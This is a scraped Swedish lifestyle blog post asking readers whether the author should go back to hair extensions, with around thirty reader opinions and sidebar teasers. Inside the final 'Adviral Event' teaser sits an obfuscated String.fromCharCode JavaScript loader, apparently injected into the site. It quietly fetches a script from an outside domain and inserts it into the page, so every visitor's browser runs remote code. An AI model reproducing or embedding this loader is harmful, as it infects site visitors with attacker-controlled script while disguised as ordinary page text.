Fredags feeling

 

 

 

image

hej…. Dagens huvudbry! Ingen värdslig sak utan bara en helt obetydelsefull sak som mitt hår. Extensions eller inte extensions?!

Alltså jag saknar verkligen mitt löshår! Det är så fruktansvärt bekvämt! Man behöver aldrig styla det till vardags. Man kan ”bara” ha en busig (tuffsig) fläta, en toffs och det ser sådär lite lagom vardags snyggt IT ändå. Dvs, kliv upp ur sängen och sätt upp en tofs, ”tada” så är det klart! När man väl vill styla det så är möjligheterna oändliga! Åhhhh! Jag tror jag vill sätta i igen. Vad tycker du? Med eller utan extensions? 🙂 

OLYMPUS DIGITAL CAMERA
! Fredag, solen skiner och det är en underbar höstdag! Jag är påväg till skolan, och laddar för en riktigt bra dag! Smoothie Time, några nya recept på G 🙂 Ska bara laborera lite till och hinna med plåta upp allt … Men, det kommer 😉 Njut av dagen, ta hand om varandra och sprid lite kärlek!  Många kramar /My Martens

61 Komentarer

 1. Spelar det någon roll vad andra tycker? Nej, gör vad du trivs bäst med. Men ett förslag…. Kan du inte ha lite kortare löshår om du väljer att sätta i nytt? Typ inte så långt som innan. Bara typ 2 dm långt.

 2. Du är lika snygg med som utan ?
  Fast jag tycker med extensions, det är snyggt och det är lätt stylat. Älskar själv känslan med att bara kunna sätta upp håret och vara presentabel, jag menar kortare frisyr efter en natts sömn…hehe…inte alltid så snyggt, behövs mer än en mini fjuttig tofs då… Egen erfarenhet såklart säkert inte så för dig ?

 3. Utan att på något sätt låta negativ… Du har ställt frågan flera gånger tidigare, och 9 av 10 tycker inte att Du ska sätta i.. Men vill du ha långt igen, så sätt i? Trevlig helg ?

 4. Utan extensions!!
  Du är sååå snygg utan och det känns rätt ute med extensions, bättre för håret också. ?
  Men du ska veta att du är sååå snygg i både och ?
  Trevlig fredag <3

   • Så här skrev My: Alltså jag saknar verkligen mitt löshår! Det är så fruktansvärt bekvämt! Man behöver aldrig styla det till vardags.
    Löshår är lika med extensions. Bara så att du vet.

 5. Du har frågat tidigare och de flesta tycker att det är snyggt som Du har nu. Det är ingen annan än Du själv som kan avgöra hur Du vill ha det. Gör det som känns rätt och riktigt. Du är fin i vilket som.

 6. Hej. Eftersom du frågar. Jag tycker att du är finare i ditt narurliga hår. Det tycker jag att de flesta är för övrigt. Men det är ditt val. Ingen kan bestämma åt dig.

 7. Hej My, sätt inte i extentsions, du är så fin i ditt egna hår. (Allla med löshör, ser exakt likadana ut, nästan iaf)
  Kram och ha en bra dag

 8. NEEEJ, skit i löshår, det ser så tillgjort ut. Våga vara annorlunda än de andra bloggarna med sina falska hår. Du är jättefin som du är !!!!!

 9. Jag röstar nej! Du är mycket finare i frisyren du har nu än tidigare. Gillar överlag inte extension, vare sig i hår eller fransar. Det ser helt enkelt aldrig naturligt ut utan det skriker fejk om det, spelar ingen roll vem som gjort det, dyr eller billig salong. Tycker jag ? men var o en gör som dom vill. Trevlig helg!

 10. Hej My
  Tycker verkligen inte du ska göra det, du är så fin i ditt eget hår
  förstår om du saknar det långa håret eftersom du har haft det så länge
  Men du är så fin i ditt egna hår
  Kram och trevlig helg

 11. Men åh varför fråga!??? Söker du bekräftelse? Varför skulle du nu börja bry dej vad folk tycker? Jag tycker personligen att löshår är trashigt.

 12. Tycker heller inte om fejk. Äkta vara är det allra bästa i dom flesta fall sen är det ju upp till var och en. Varför ha massa skit i håret. Låt det växa ut själv istället då.

 13. Gud bevare mig väl! För guds skull UTAN såklart. Och som jag märker så säger majoriteten det oxå! Så ta till dig för en gång skull!!!!.

 14. Du är jättefin utan. Men även fin med ?
  Men istället för att slippa hålla på att fixa håret varje dag.
  Så är det ju bekvämt med extensions ?
  Så varför inte.

 15. Absolut INTE löshår! Snyggare, mer mogen och mer stylish look med kortare eget hår – alla dagar i veckan! Att så många kämpar med dessa löshår för att efterlikna någon barbieförebild är ju helt knäppt. Tycker jag. Visst, är man runt 20 så kan jag förstå att man tycker att det är snyggt, men det blir lite patetiskt med långt barbiehår, barbietuttar, lösögonfransar och fillers i ankläppar….riktigt fult. Nä, jag tycker faktiskt att naturligast är snyggast. Du är fin som är du, tycker jag och tydligen många fler!

  • Sätt i löshår och klipp det lite kortare,själv har jag satt i löshår men det är för att mitt hår är så himla tunt och växer inte ordentligt men nu för tiden klipper jag det så det är en bit nedanför axlarna,man kan ha extensions för att ”fylla ut” sitt egna hår och jag tycker det är kanonbra ?

 16. Sätt i löshår ? om du känner det mer bekvämt och lättare att styla. Man ska ha det man trivs i. Fast såklart du är ju fin, i både långt och kort hår.

 17. Du är jätte fin i dit hår nu så naturligt!Så jag säger NEJ ? .Men det är ju du som bestämmer och känner vad som känns bäst. Ha en skön helg, kram

 18. Inget löshår! Ser billigt ut och känns passe’. Löshår för att håret ska se tjockare ut kan vara fint dock.
  Du ser så naturlig och fin ut i det du har nu! Classy funkar alltid, trashy inte
  Trevlig helg!

 19. Tänker samma som många andra du har frågat flera gånger och som sagt flertalet tycker inte att du ska ha extensions, men känner du dig bättre med så ska du så klart göra det.

 20. Du äter ju Bobbys hår kapslar? så du har väl ändå snart fått ditt egna hår att bli längre eller? Du e snyggast med ditt naturliga hår.

 21. Absolut inte löshår….sååå mycket fräschare utan och lite mer klass? ser lätt billigt ut med löshår tycker jag. Du är jättefin nu!!
  Kram

 22. Jag tycker att du ska göra det du känner mest för. Passa på att ha extensions nu medan du kan, det kommer en dag när det inte känns ok längre, men då har du iaf följt din vilja och gjort det du kände för mest. Hade jag varit i din ålder så hade jag kört löshår ända ner till knäna. ? Livet går fort och det kanske kommer en dag när du inte tycker att det känns bra längre, tills dess gör du precis vad du vill med ditt hår. Ha en fin helg! Kram! ?

  • Spelar väl ingen roll hur gammal man är?Jag är 47 och sätter in extentions för att fylla ut mitt eget hår som är tunt. Har haft det i 10 år och tänker fortsätta med det!Gör precis som du vill My <3

 23. Du är fin i håret nu. Men jag förstår precis vad du menar med extensions!
  Jag har det själv och som du sa….. Bara å gå upp, borta håret lite. Sätta upp i tops.
  Vipps, skitsnyggt! Även utsläppt. Alltid…….

 24. Inget löshår. Du kan ju sätta upp ditt eget hår. Låt det vila och du får ett jättebra hår som du kommer att kunna göra vad du vill med. Lyssna på Bobby han är nog den bästa du kan ha kontakt med. Alla bloggare har ju löshår och det syns . Du är så mycket mer naturlig så stanna kvar med ditt egna hår. Mycket finare är du med det.
  Tro mig jag talar sannning

 25. Du ser bäst ut utan extenstions. som någon sa tidigare, alla ser exakt likadana ut. Man ser på lång väg att det inte är äkta, sådant hår rör sig ju inte ens. Dessutom tror jag många flera tar dig på större allvar när du ser äkta ut till skillnad från andra blonda bloggerskor som betraktas som ganska korkade och synnerligen ytliga.
  Du är superfin i den frisyr du har nu med bara ditt eget hår.

 26. Som många andra kommenterat så handlar det om vad man själv trivs med så klart. Fint med långt hår, men jisses vilket wow-lyft jag tyckte det var med den nya ”kortare” frisyren. Så snyggt, passar och ramar verkligen in ditt ansikte som på något sätt kom fram mer. Elegant, kvinnligt och ser väldigt fräscht ut:)

 27. Säger det igen; löshår, men INTE lika mycket/långt som på bilden.. Själv har jag haft extensions i några år och kan absolut inte sluta? känns som att tape extensions är ganska skonsamt för det egna håret oxå?

 28. Hade inte satt löshår. Vänta på att ditt växer ut o blir lite längre istället isånafall. Tycker ansiktet försvinner i allt löshår ? Och en onödig kostnad ?

 29. Du är verkligen fin som du är nu, men när det kommer till ens egen kropp och utseende tycker jag att då tar man ställning till det själv. Extension, botox, filler, färga håret, inte färga, lösfransar, inte lösfransar, sminkad, osminkad osv…så är det DEN personens val. Sen är det bara att strunta i vad andra tycker i dom val man gör.
  Du är jättefin precis som du är ?

 30. Skit i löshåret. Du är så fin med ditt egna.
  En person jag kände klippte av sitt långlångs EGNA tjocka hår ( det gick nästan ner till midjan)efter att ha haft det långt i 15 år.
  Jag grät! Tänkte att ingen Stockholmsfrisör skulle låta henne göra det! Men jo
  Men när jag fick se det WOUW vad snygg hon blev
  En äldre person i min omgivning sa då att hon aldrig förstått sig på dessa långa hår som alla har nuförtiden när de ändå i stort sett bara sätter upp det
  Du frågade och du får svar men min personliga åsikt är att du är mycket vackrare med DITT eget lite kortare hår
  Men i slutänden är det ju du själv som bestämmer
  Hursomhelst så sitter inte personlighet och sexighet i håret
  Det vackra kommer inifrån och är man vacker där då lyser det om en i alla fall

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/